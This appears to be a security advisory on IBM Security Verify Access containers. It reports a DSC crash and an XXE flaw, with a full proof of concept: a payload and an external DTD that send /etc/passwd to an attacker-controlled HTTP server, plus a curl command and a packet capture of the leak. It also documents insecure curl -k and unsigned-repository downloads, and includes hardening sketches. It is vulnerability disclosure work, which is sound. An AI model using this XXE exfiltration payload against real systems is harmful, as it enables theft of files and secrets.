0x7fecb007a5a4 <_ZN12DSessWrapper4pingEPv+180>: call QWORD PTR [rax+0x2f0]
[------------------------------------stack-------------------------------------]
0000| 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48
0008| 0x7feca642fc18 --> 0x7fecaf292d8e --> 0xda89481d74c08548
0016| 0x7feca642fc20 --> 0x7fec28040830 --> 0x7fecaf4e00a0 --> 0x7fecaf29b5a0 --> 0x4100246a21058b48
0024| 0x7feca642fc28 --> 0x1e3f6e0 --> 0x7fecaf4e1120 --> 0x7fecaf2b2450 --> 0x530022f9a9058b48
0032| 0x7feca642fc30 --> 0x7feca642fc80 --> 0x7feca642fc90 --> 0x7fec30071c00 --> 0x50 ('P')
0040| 0x7feca642fc38 --> 0x7fec3800e720 --> 0x7fecaf4dece8 --> 0x7fecaf27a770 --> 0x4800267369058b48
0048| 0x7feca642fc40 --> 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48
0056| 0x7feca642fc48 --> 0x7fecaf27a8a1 --> 0xf2e668debc48941
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
gdb-peda$ bt
#0 0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
#1 0x00007fecaf27a8a1 in tivsec_axiscpp::ServerAxisEngine::invoke(tivsec_axiscpp::MessageData*) () from target:/lib64/libtivsec_axis_server.so
#2 0x00007fecaf27b0d2 in tivsec_axiscpp::ServerAxisEngine::process(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
#3 0x00007fecaf297156 in process_request(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
#4 0x00007fecb02a3293 in AMWSMSServiceClient::processRequest(AMWSMSService::WorkerRequest&, bool) () from target:/lib64/libamdsc_server.so
#5 0x00007fecb02a3ff8 in AMWSMSService::workerThreadRun() () from target:/lib64/libamdsc_server.so
#6 0x00007fecb02a4089 in start_worker_thread () from target:/lib64/libamdsc_server.so
#7 0x00007fecaec801ca in start_thread () from target:/lib64/libpthread.so.0
#8 0x00007fecae6d3d83 in clone () from target:/lib64/libc.so.6
I can also confirm the null pointer dereference in the dmesg output of the container-02 test server:
[899328.145854] dscd[2106406]: segfault at 0 ip 00007f18e53ff595 sp 00007f18db93ac10 error 4 in libamdsc_interface.so[7f18e53ec000+30000]
[899485.595069] dscd[2107491]: segfault at 0 ip 00007f25a6041595 sp 00007f259c9cdc10 error 4 in libamdsc_interface.so[7f25a602e000+30000]
[899575.542524] dscd[2109718]: segfault at 0 ip 00007f331fde5595 sp 00007f3316938c10 error 4 in libamdsc_interface.so[7f331fdd2000+30000]
[899614.404309] dscd[2111181]: segfault at 0 ip 00007fec9cad4595 sp 00007fec9d29dc10 error 4 in libamdsc_interface.so[7fec9cac1000+30000]
[899761.869511] dscd[2112040]: segfault at 0 ip 00007f86cf8a0595 sp 00007f86c5edfc10 error 4 in libamdsc_interface.so[7f86cf88d000+30000]
I can confirm the verify-access-dsc instance crashes on container-02 as shown below.
Before the PoC, the verify-access-dsc instance is running:
[root@container-02]# podman ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
e462789b901b ibmcom/verify-access-runtime/10.0.4.0:20220926.6 28 hours ago Up 28 hours ago (healthy) 0.0.0.0:9443->9443/tcp verify-access-runtime
0ff1b85073d6 ibmcom/verify-access-dsc/10.0.4.0:20220926.6 28 hours ago Up 28 minutes ago (healthy) 0.0.0.0:8443-8444->8443-8444/tcp verify-access-dsc
After the PoC, the verify-access-dsc instance does not run anymore:
[root@container-02]# podman ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
e462789b901b ibmcom/verify-access-runtime/10.0.4.0:20220926.6 28 hours ago Up 28 hours ago (healthy) 0.0.0.0:9443->9443/tcp verify-access-runtime
[root@container-02]#
An attacker with the dsc-client SSL certificate can crash the DSC servers and crash the entire authentication system.
Details - XML External Entity (XXE) in dscd
It was observed that the DSC (Distributed Session Cache) servers are vulnerable to XML External Entity (XXE) attacks. DSC servers are used to store session information.
The DSC servers are reachable using the /DSess/services/DSess API running on port 8443/tcp.
With a client certificate, we can reach the /DSess/services/DSess API.
Content of the payload.txt file containing the XXE payload that will be sent to the remote DSC server:
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://10.0.0.45/dtd.xml">
%xxe;
]>
<foo></foo>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:ping xmlns:ns1="http://sms.am.tivoli.com">
<ns1:something>X</ns1:something>
</ns1:ping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Content of the dtd.xml file hosted on http://10.0.0.45/. This DTD file is referenced by the payload.txt file:
kali% cat /var/www/html/dtd.xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.0.0.45/?x=%file;'>">
%eval;
%exfiltrate;
Sending the previous payload will result in an exception on the remote DSC server:
kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -H 'SOAPAction: "ping"' --data '@payload.txt' -v
* Trying 10.0.0.16:8443...
* Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
[...]
> POST /DSess/services/DSess HTTP/1.1
> Host: dsc-02.test.lan:8443
> User-Agent: curl/7.82.0
> Accept: */*
> SOAPAction: "ping"
> Content-Length: 453
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Apache Axis C++/1.6.a
< Connection: close
< Content-Length: 330
< Content-Type: text/xml
<
<?xml version='1.0' encoding='utf-8' ?>
<SOAP-ENV:Envelope>
<SOAP-ENV:Body>
<SOAP-ENV:Fault>
<faultcode>SOAP-ENV:Server</faultcode>
<faultstring>Unknown exception</faultstring>
<faultactor>server name:listen port</faultactor>
<detail>Unknown Exception has occured</detail>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
At the same time, when sniffing the HTTP connections to the remote HTTP server serving http://10.0.0.45/?x=%file, we can observe HTTP requests coming from the DSC server (acting as an HTTP client).
There is a successful exfiltration of the /etc/passwd file of the DSC instance - this file was specified in the dtd.xml file at http://10.0.0.45/dtd.xml, used by the malicious payload:
kali# tcpdump -n -i eth0 -s0 -X port 80
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:01:12.655204 IP 10.0.0.16.60254 > 10.0.0.45.80: Flags [P.], seq 1:753, ack 1, win 229, options [nop,nop,TS val 2959987485 ecr 3936552717], length 752: HTTP: GET /root:x:0:0:root:/root:/bin/bash
[...]
0x0030: eaa3 070d 4745 5420 2f72 6f6f 743a 783a ....GET./root:x:
0x0040: 303a 303a 726f 6f74 3a2f 726f 6f74 3a2f 0:0:root:/root:/
0x0050: 6269 6e2f 6261 7368 0a62 696e 3a78 3a31 bin/bash.bin:x:1
0x0060: 3a31 3a62 696e 3a2f 6269 6e3a 2f73 6269 :1:bin:/bin:/sbi
0x0070: 6e2f 6e6f 6c6f 6769 6e0a 6461 656d 6f6e n/nologin.daemon
0x0080: 3a78 3a32 3a32 3a64 6165 6d6f 6e3a 2f73 :x:2:2:daemon:/s
0x0090: 6269 6e3a 2f73 6269 6e2f 6e6f 6c6f 6769 bin:/sbin/nologi
0x00a0: 6e0a 6164 6d3a 783a 333a 343a 6164 6d3a n.adm:x:3:4:adm:
0x00b0: 2f76 6172 2f61 646d 3a2f 7362 696e 2f6e /var/adm:/sbin/n
0x00c0: 6f6c 6f67 696e 0a6c 703a 783a 343a 373a ologin.lp:x:4:7:
0x00d0: 6c70 3a2f 7661 722f 7370 6f6f 6c2f 6c70 lp:/var/spool/lp
0x00e0: 643a 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a d:/sbin/nologin.
0x00f0: 7379 6e63 3a78 3a35 3a30 3a73 796e 633a sync:x:5:0:sync:
0x0100: 2f73 6269 6e3a 2f62 696e 2f73 796e 630a /sbin:/bin/sync.
0x0110: 7368 7574 646f 776e 3a78 3a36 3a30 3a73 shutdown:x:6:0:s
0x0120: 6875 7464 6f77 6e3a 2f73 6269 6e3a 2f73 hutdown:/sbin:/s
0x0130: 6269 6e2f 7368 7574 646f 776e 0a68 616c bin/shutdown.hal
0x0140: 743a 783a 373a 303a 6861 6c74 3a2f 7362 t:x:7:0:halt:/sb
0x0150: 696e 3a2f 7362 696e 2f68 616c 740a 6d61 in:/sbin/halt.ma
0x0160: 696c 3a78 3a38 3a31 323a 6d61 696c 3a2f il:x:8:12:mail:/
0x0170: 7661 722f 7370 6f6f 6c2f 6d61 696c 3a2f var/spool/mail:/
0x0180: 7362 696e 2f6e 6f6c 6f67 696e 0a6f 7065 sbin/nologin.ope
0x0190: 7261 746f 723a 783a 3131 3a30 3a6f 7065 rator:x:11:0:ope
0x01a0: 7261 746f 723a 2f72 6f6f 743a 2f73 6269 rator:/root:/sbi
0x01b0: 6e2f 6e6f 6c6f 6769 6e0a 6761 6d65 733a n/nologin.games:
0x01c0: 783a 3132 3a31 3030 3a67 616d 6573 3a2f x:12:100:games:/
0x01d0: 7573 722f 6761 6d65 733a 2f73 6269 6e2f usr/games:/sbin/
0x01e0: 6e6f 6c6f 6769 6e0a 6674 703a 783a 3134 nologin.ftp:x:14
0x01f0: 3a35 303a 4654 5020 5573 6572 3a2f 7661 :50:FTP.User:/va
0x0200: 722f 6674 703a 2f73 6269 6e2f 6e6f 6c6f r/ftp:/sbin/nolo
0x0210: 6769 6e0a 6e6f 626f 6479 3a78 3a36 3535 gin.nobody:x:655
0x0220: 3334 3a36 3535 3334 3a4b 6572 6e65 6c20 34:65534:Kernel.
0x0230: 4f76 6572 666c 6f77 2055 7365 723a 2f3a Overflow.User:/:
0x0240: 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a 6973 /sbin/nologin.is
0x0250: 616d 3a78 3a36 3030 303a 3630 3030 3a3a am:x:6000:6000::
0x0260: 2f68 6f6d 652f 6973 616d 3a2f 6269 6e2f /home/isam:/bin/
0x0270: 6261 7368 0a69 766d 6772 3a78 3a36 3030 bash.ivmgr:x:600
0x0280: 313a 3630 3031 3a41 6363 6573 7320 4d61 1:6001:Access.Ma
0x0290: 6e61 6765 7220 5573 6572 3a2f 6f70 742f nager.User:/opt/
0x02a0: 506f 6c69 6379 4469 7265 6374 6f72 3a2f PolicyDirector:/
0x02b0: 6269 6e2f 6661 6c73 650a 7469 766f 6c69 bin/false.tivoli
0x02c0: 3a78 3a36 3030 323a 3630 3032 3a4f 776e :x:6002:6002:Own
0x02d0: 6572 206f 6620 5469 766f 6c69 2043 6f6d er.of.Tivoli.Com
[...]
An attacker can read any file located in the instance - the DSC server will send any file specified in the payload to an attacker-controlled HTTP server.
An attacker with the dsc-client SSL certificate can exfiltrate any sensitive information from the instance.
Details - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)
It was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure communications to download several rpm and zip files, which are then installed or decompressed as root.
The /usr/sbin/install_isva.sh script contains insecure downloading of rpm files and zip files. These rpm files will then be installed as root.
An attacker located on the network can inject malicious rpm or zip files into the authentication platform and take control over the entire authentication platform.
There are 3 different /usr/sbin/install_isva.sh scripts found in these images but they share the same vulnerable code:
kali-docker# sha256sum **/install_isva.sh
1c851f579baeda9d3c11e7721aaa5960dc6a3d6b052bcc8a46979d0634e31892 _verify-access-dsc.tar/787d9cec79e27fccd75a56b7101b39da38161f9d3749d6d0fd7cfcc8252aca34/usr/sbin/install_isva.sh
00f2ca8ad004af9c9e16b6cfdf480dcdb52dc36c7ff64df2bcc34495f6a9ae8d _verify-access-runtime.tar/694cb5f84eff9a4b0aac37a4bd9f65116051953f3aee5e4e998af5938e684a5e/usr/sbin/install_isva.sh
8a59d7f89c6d587d9b764b9e4748cf0d20d406f65433a813464b32a13745f6da _verify-access-wrp.tar/937031a6ab4bc7bd504dcbee8d242f181e904c1722489077cf468daae176e2da/usr/sbin/install_isva.sh
Vulnerable code in verify-access-dsc - download over HTTP or without checking the SSL certificate (lines 24, 60 and 82) and installation of packages as root without checking the signatures (line 76):
Content of /usr/sbin/install_isva.sh in verify-access-dsc:
[code:shell]
22 files=/root/files.txt
23
24 curl -k ${WEBSERVER}/ -o $files
[...]
38 #
39 # Install each of our RPMs.
40 #
41
42 pkgs="gskcrypt64 \
43 gskssl64 \
44 Base-ISVA \
45 idsldap-license64 \
46 idsldap-cltbase64 \
47 idsldap-clt64bit64 \
48 Pdlic-PD \
49 TivSecUtl-TivSec \
50 PDRTE-PD \
51 PDWebRTE-PD \
52 PDWebDSC-PD"
53
54 for pkg in $pkgs; do
55 echo "Installing $pkg"
56
57 # Download and install the file.
58 rpm_file=`locate_rpm_file $pkg`
59
60 curl -fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file
[...]
76 rpm -i $extra_args /root/$rpm_file
[...]
78 # Download the include file and delete all files not included in the file.
79 include=`rpm -qp /root/$rpm_file --qf "%{NAME}.include"`
80 include_file=/root/$include
81
82 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e
83
84 if [ $rc -eq 0 -a -f $include_file ] ; then
85 # Convert the include file to be regular expression based instead of
86 # glob based.
87 sed -i "s|*|.*|g" $include_file
88
89 for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do
90 if [ -f $entry ] ; then
91 rm -f $entry
92 fi
93 done
94 fi
[/code]
The code in verify-access-wrp is also very similar and shares the same vulnerabilities.
Vulnerable code in verify-access-runtime - same vulnerability in /usr/sbin/install_isva.sh with an additional vulnerability with the insecure download, due to the -k option on line 117 (alias to --insecure) and extraction of zip files as root in line 119:
[code:shell]
28 files=/root/files.txt
29
30 curl -k ${WEBSERVER}/ -o $files
[...]
41 pkgs="gskcrypt64 \
42 gskssl64 \
43 Base-ISVA \
44 PDlic-PD \
45 TivSecUtl-TivSec \
46 PDRTE-PD \
47 PDWebWAPI-PD \
48 PDWebDSC-PD \
49 VerifyAccessRuntimeFeatures \
50 MesaConfig \
51 FIM \
52 RBA"
53
54 for pkg in $pkgs; do
55 echo "Installing $pkg"
56
57 # Download and install the file.
58 rpm_file=`locate_rpm_file $pkg`
59
60 curl --fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file
[...]
78 rpm -i $extra_args /root/$rpm_file
79
80 # Download the include file and delete all files not included in the file.
81 include=`rpm -qp /root/$rpm_file --qf "%{NAME}.include"`
82 include_file=/root/$include
83
84 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e
85
86 if [ $rc -eq 0 -a -f $include_file ] ; then
87 # Convert the include file to be regular expression based instead of
88 # glob based.
89 sed -i "s|*|.*|g" $include_file
90
91 for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do
92 if [ -f $entry ] ; then
93 rm -f $entry
94 fi
95 done
96 fi
[...]
108 zips="\
109 com.ibm.tscc.rtss.wlp.zip:/opt/rtss \
110 com.ibm.isam.common.eclipse.wlp.zip:/opt/IBM \
111 pdjrte-0.0.0-0.zip:/opt"
112
113 for entry in $zips; do
114 zip=`echo $entry | cut -f 1 -d ':'`
115 dst=`echo $entry | cut -f 2 -d ':'`
116
117 curl --fail -s -k ${WEBSERVER}/$zip -o /root/$zip
118 mkdir -p $dst
119 unzip -q /root/$zip -d $dst
120
121 rm -f /root/$zip
122 done
[/code]
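One way to blunt this class of attack, sketched below under our own assumptions (hypothetical file names; the product itself ships no such check): verify each downloaded artifact against a checksum obtained over an authenticated channel before handing it to rpm or unzip, so a MITM-substituted file is rejected even when the transport is compromised.

```shell
#!/bin/sh
# Illustration only - pkg.rpm and its .sha256 file are hypothetical.
tmpdir=$(mktemp -d)
printf 'fake rpm payload' > "$tmpdir/pkg.rpm"

# Trusted checksum, normally published out of band by the build system.
( cd "$tmpdir" && sha256sum pkg.rpm > pkg.rpm.sha256 )

# Verification step that would run before "rpm -i".
if ( cd "$tmpdir" && sha256sum -c pkg.rpm.sha256 >/dev/null 2>&1 ); then
    echo "checksum ok - safe to install"
else
    echo "checksum mismatch - rejecting"
fi

rm -rf "$tmpdir"
```

For rpm packages specifically, GPG-signed packages checked with `rpm --checksig` (and repositories with gpgcheck enabled) achieve the same end without a side channel for checksums.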
Details - Remote Code Execution due to insecure download of zip files in verify-access-runtime (/usr/sbin/install_java_liberty.sh)
It was observed that the Docker image verify-access-runtime insecurely downloads zip files.
An attacker located on the network can inject malicious zip files into the platform and take control over the entire platform.
The /usr/sbin/install_java_liberty.sh script contains insecure downloading of zip files. These zip files will then be extracted as root into the /opt/java, /opt/ibm, /opt/oracle/jdbc and /opt/IBM/db2 directories, supplying the WebSphere Liberty binaries (which will then be used to run executable code).
It is also possible to remotely delete any file as root (lines 61 to 65).
Vulnerable code in /usr/sbin/install_java_liberty.sh:
[code:shell]
14 web_files=/root/files.txt
15
16 locate_file()
17 {
18 grep "$1" $web_files | cut -f 2 -d '"'
19 }
20 curl -k ${WEBSERVER}/ -o $web_files
21
[...]
29 #
30 # Install each of our zip files.
31 #
32
33 zips="\
34 ibm-semeru-open-jre_x64_linux_11.*.tar.gz:/opt/java \
35 liberty.*.zip:/opt/ibm \
36 oracle_jdbc_*.*.zip:/opt/oracle/jdbc \
37 ibm-db2-jdbc.*.tar.gz:/opt/IBM/db2"
38
39 for entry in $zips; do
40 zip=`echo $entry | cut -f 1 -d ':'`
41 dst=`echo $entry | cut -f 2 -d ':'`
42
43 # Download and install the file.
44 zip_file=`locate_file $zip`
45
46 curl --fail -s -k ${WEBSERVER}/$zip_file -o /root/$zip_file
47
48 mkdir -p $dst
49
50 set +e; echo $zip | grep -q .zip; rc=$?; set -e
51 if [ $rc -eq 0 ] ; then
52 unzip -q /root/$zip_file -d $dst
53 exclude=`echo $zip_file | sed "s|.zip|.exclude|g"`
54 else
55 tar -x -C $dst -f /root/$zip_file
56 exclude=`echo $zip_file | sed "s|.tar.gz|.exclude|g"`
57 fi
58
59 exclude_file=/root/$exclude
60
61 set +e; curl --fail -s -k ${WEBSERVER}/$exclude -o $exclude_file; rc=$?; set -e
62
63 if [ $rc -eq 0 -a -s $exclude_file ] ; then
64 cd $dst
65 cat $exclude_file | xargs rm -rf
66 fi
[/code]
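A minimal hardening sketch for this download step (not IBM's code; the `verify_sha256` helper and the pinning scheme are hypothetical): keep TLS verification enabled by dropping `-k`, and refuse to extract any archive whose SHA-256 does not match a value pinned at build time.

```shell
# Hypothetical hardening sketch: verify a pinned SHA-256 before trusting
# a downloaded archive. In install_java_liberty.sh this check would run
# right after each curl download and before any unzip/tar extraction.
verify_sha256()
{
    file="$1"; expected="$2"
    actual=$(sha256sum "$file" | cut -f 1 -d ' ')
    [ "$actual" = "$expected" ]
}

# In the real script the call site would look like this (no -k, so TLS
# stays verified; PINNED_SHA256 would be a build-time constant):
#   curl --fail -s "${WEBSERVER}/$zip_file" -o "/root/$zip_file"
#   verify_sha256 "/root/$zip_file" "$PINNED_SHA256" || exit 1

# Self-contained demo with a local file standing in for the download.
printf 'payload' > /tmp/demo.zip
good=$(printf 'payload' | sha256sum | cut -f 1 -d ' ')
verify_sha256 /tmp/demo.zip "$good" && echo "checksum ok"
verify_sha256 /tmp/demo.zip "deadbeef" || echo "tampered archive rejected"
```

A checksum pinned in the image build keeps a network attacker from substituting archives even when the web server itself cannot be authenticated.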
Details - Remote Code Execution due to insecure Repository configuration
It was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure CentOS repositories:
- The transport is done over HTTP (in clear-text) instead of HTTPS.
- The check of the package signatures is disabled.
- These repositories are enabled by default.
An attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious RPMs and take control over the entire platform.
The /usr/sbin/install_system.sh script in these 3 images enables 4 remote repositories over HTTP and disables signature checking for the packages downloaded from these repositories:
31 centos_repo_file="/etc/yum.repos.d/centos.repo"
32
33 cat <<EOT >> $centos_repo_file
34 [CentOS-8_base]
35 name = CentOS-8 - Base
36 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
37 gpgcheck = 0
38 enabled = 1
39
40 [CentOS-8_appstream]
41 name = CentOS-8 - AppStream
42 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
43 gpgcheck = 0
44 enabled = 1
45 EOT
[...]
98 #
99 # Enable install of the busybox RPM from the Fedora repository.
100 #
101
102 fedora_repo_file="/etc/yum.repos.d/fedora.repo"
103
104 cat <<EOT >> $fedora_repo_file
105 [fedora]
106 name=Fedora
107 metalink=https://mirrors.fedoraproject.org/metalink?repo=fedora-33&arch=x86_64
108 enabled=1
109 gpgcheck=0
110
111 [fedora-updates]
112 name=Fedora Updates
113 metalink=https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33&arch=x86_64
114 enabled=1
115 gpgcheck=0
116 EOT
It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:
[root@container-01]# for i in $(podman ps | grep -v NAMES | awk '{ print $1 }'); do podman ps | grep $i; podman exec -it $i cat /etc/yum.repos.d/centos.repo;echo;done
4262005f3646 ibmcom/verify-access/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:7443->9443/tcp verify-access
cat: /etc/yum.repos.d/centos.repo: No such file or directory
c930c46acd66 ibmcom/verify-access-runtime/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:9443->9443/tcp verify-access-runtime
name = CentOS-8 - Base
baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
gpgcheck = 0
enabled = 1
[CentOS-8_appstream]
name = CentOS-8 - AppStream
baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
gpgcheck = 0
enabled = 1
48f1b1e8f782 ibmcom/verify-access-dsc/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:8443-8444->8443-8444/tcp verify-access-dsc
cat: /etc/yum.repos.d/centos.repo: No such file or directory
[root@container-01]#
Furthermore, the script /usr/sbin/install_system.sh will insecurely download programs and install them as root, using the previous insecure repositories:
[code:shell]
48 # Install tools required for container build process.
49 #
50
51 microdnf -y install unzip shadow-utils jansson openssl libxslt \
52 libnsl2 gzip cpio tar
[...]
55 # We have an issue where RedHat periodically introduces a dependency on
56 # openssl-pkcs11. We don't actually need this package and so we manually remove
57 # it if it has been installed.
58 #
59
60 if [ `rpm -q -a | grep openssl-pkcs11 | wc -l` -ne 0 ] ; then
61 rpm --erase openssl-pkcs11
62 fi
[...]
70 rpms=""
71 for lang in en cs de es fi fr hu it ja ko nl pl pt ru zh; do
72 rpms="$rpms glibc-langpack-$lang"
73 done
[...]
122 microdnf -y install busybox
[/code]
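A hardened variant of the repository configuration quoted above (a sketch; section names are kept from the original, and it assumes the mirror serves HTTPS) would use TLS transport and enable GPG verification against the standard CentOS key shipped in /etc/pki/rpm-gpg:

```
[CentOS-8_base]
name = CentOS-8 - Base
baseurl = https://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
gpgcheck = 1
gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-centosofficial
enabled = 1
```

With `gpgcheck = 1`, a package injected by an on-path attacker fails signature verification instead of being installed silently.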
Details - Additional repository configuration (potential supply-chain attack)
It was observed that the Docker images verify-access-runtime and verify-access-wrp use a third-party repository configuration, obtained when retrieving the external file at https://repo.symas.com/configs/SOFL/rhel8/sofl.repo:
Content of /usr/sbin/install_system.sh:
[code:shell]
47 #
48 # Install OpenLDAP. This is no longer provided by CentOS.
49 #
50
51 sofl_repo_file="/etc/yum.repos.d/sofl.repo"
52
53 curl https://repo.symas.com/configs/SOFL/rhel8/sofl.repo \
54 -o $sofl_repo_file
[/code]
It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:
[isam@verify-access-runtime /]$ cat /etc/yum.repos.d/sofl.repo
[sofl]
name=Symas OpenLDAP for Linux RPM repository
baseurl=https://repo.symas.com/repo/rpm/SOFL/rhel8
gpgkey=https://repo.symas.com/repo/gpg/RPM-GPG-KEY-symas-com-signing-key
gpgcheck=1
enabled=1
[isam@verify-access-runtime /]$
When reading the /usr/sbin/install_system.sh script, this repository is used to install an additional package, without checking the signature:
[code:shell]
58 #
59 # We want to manually install the openldap server RPM as microdnf pulls
60 # in a whole heap of dependencies which we don't require.
61 #
62
63 baseurl=`grep baseurl $sofl_repo_file | cut -f 2 -d '='`/x86_64
64 version=`rpm -q --qf "%{VERSION}-%{RELEASE}" symas-openldap`
65 rpmfile=/tmp/openldap.rpm
66
67 curl $baseurl/symas-openldap-servers-$version.x86_64.rpm -o $rpmfile
68
69 rpm -i --nodeps $rpmfile
70
71 rm -f $rpmfile
[/code]
This constitutes a potential supply-chain attack vector, and this dependency is not documented.
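The missing signature check can be made a hard gate before rpm is ever invoked. The sketch below is a hypothetical pattern, not IBM's code: in the real script the verifier would be `rpm -K` (after an `rpm --import` of the Symas signing key), which exits non-zero on a bad or missing signature; the demo substitutes `true`/`false` so it can run anywhere.

```shell
# Hypothetical guard: run the installer only if the verifier succeeds.
# In install_system.sh, verify_cmd would be "rpm -K" and install_cmd
# would be "rpm -i" (without --nodeps).
guarded_install()
{
    verify_cmd="$1"; install_cmd="$2"; pkg="$3"
    if "$verify_cmd" "$pkg" ; then
        "$install_cmd" "$pkg"
    else
        echo "verification failed: $pkg" >&2
        return 1
    fi
}

# Demo with stand-in verifiers (true/false) instead of rpm -K.
touch /tmp/openldap.rpm
guarded_install true  echo /tmp/openldap.rpm
guarded_install false echo /tmp/openldap.rpm || echo "install blocked"
```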
Details - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime
It was observed that the Docker image verify-access-runtime uses a highly insecure /usr/sbin/install_system.sh script.
With the 2 previous vulnerabilities already explained in Additional repository configuration (potential supply-chain attack) and Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh), this version adds 2 new vulnerabilities:
- Installation of 3 packages downloaded over HTTP without checking the signature (lines 82, 84 and 90); and
- Replacement of /usr/share/java/postgresql-jdbc/postgresql.jar using a postgresql.jar file directly retrieved over HTTP (line 99) and with -k (aka --insecure).
Content of /usr/sbin/install_system.sh:
[code:shell]
73 #
74 # For the postgresql packages we need to download and install manually so
75 # that we don't also pull in all of the unnecessary dependencies.
76 #
77
78 centos_base=http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/
79
80 rpms=/tmp/rpms.txt
81
82 curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms
83
84 for pkg in postgresql-12 postgresql-server-12 postgresql-jdbc-42; do
85 rpm_file=`grep $pkg $rpms | tail -n 1 | \
86 sed 's|.*href="||g' | cut -f 1 -d '"'`
87
88 echo "Installing: $rpm_file"
89
90 rpm -i --nodeps $centos_base/$rpm_file
91 done
92
93 rm -f $rpms
94
95 #
96 # Need a more current jar then what is part of the postges-jdbc rpm
97 #
98 postgres_jar=`locate_file postgresql-.*.jar`
99 curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar
[/code]
An attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious rpm or a malicious .jar file and take control over the entire platform.
Note that IBM does not consider this a vulnerability since the script is supposed to be executed in a secure network.
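The insecure patterns in this script are easy to flag mechanically. A small audit sketch (`audit_script` is a hypothetical helper, not part of the product) that greps a shell script for `curl -k`/`--insecure` and for clear-text `http://` URLs:

```shell
# Hypothetical audit helper: flag curl invocations that disable TLS
# verification, and any hardcoded clear-text http:// URL.
audit_script()
{
    f="$1"
    grep -nE 'curl[^|]*(-k|--insecure)' "$f" && echo "insecure TLS in $f"
    grep -nE 'http://' "$f" && echo "clear-text URL in $f"
    return 0
}

# Demo against the two patterns quoted above.
cat > /tmp/sample.sh <<'EOF'
curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms
curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar
EOF
audit_script /tmp/sample.sh
```

Running such a check in CI would have caught every insecure download described in this advisory.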
Details - Remote Code Execution due to insecure reload script in verify-access-runtime
It was observed that the Docker image verify-access-runtime uses a highly insecure reload script.
An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform.
This script is defined at the end of the /usr/sbin/install_system.sh script:
Content of /usr/sbin/install_system.sh in verify-access-runtime:
[code:shell]
239 #
240 # Ensure that the reload script is executable.
241 #
242
243 mv /sbin/reload.sh /sbin/runtime_reload
244
245 chmod 755 /sbin/runtime_reload
[/code]
Analysis of /sbin/runtime_reload:
The function download_from_cfgsvc() is insecure as the curl command uses the -k option (also known as --insecure) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the -k option.
We can also see that Postgres does not require a password (line 144), an issue already described in Lack of authentication in Postgres inside verify-access-runtime.
[code:shell]
67 #############################################################################
68 # Attempt to download the snapshot from the configuration service.
69
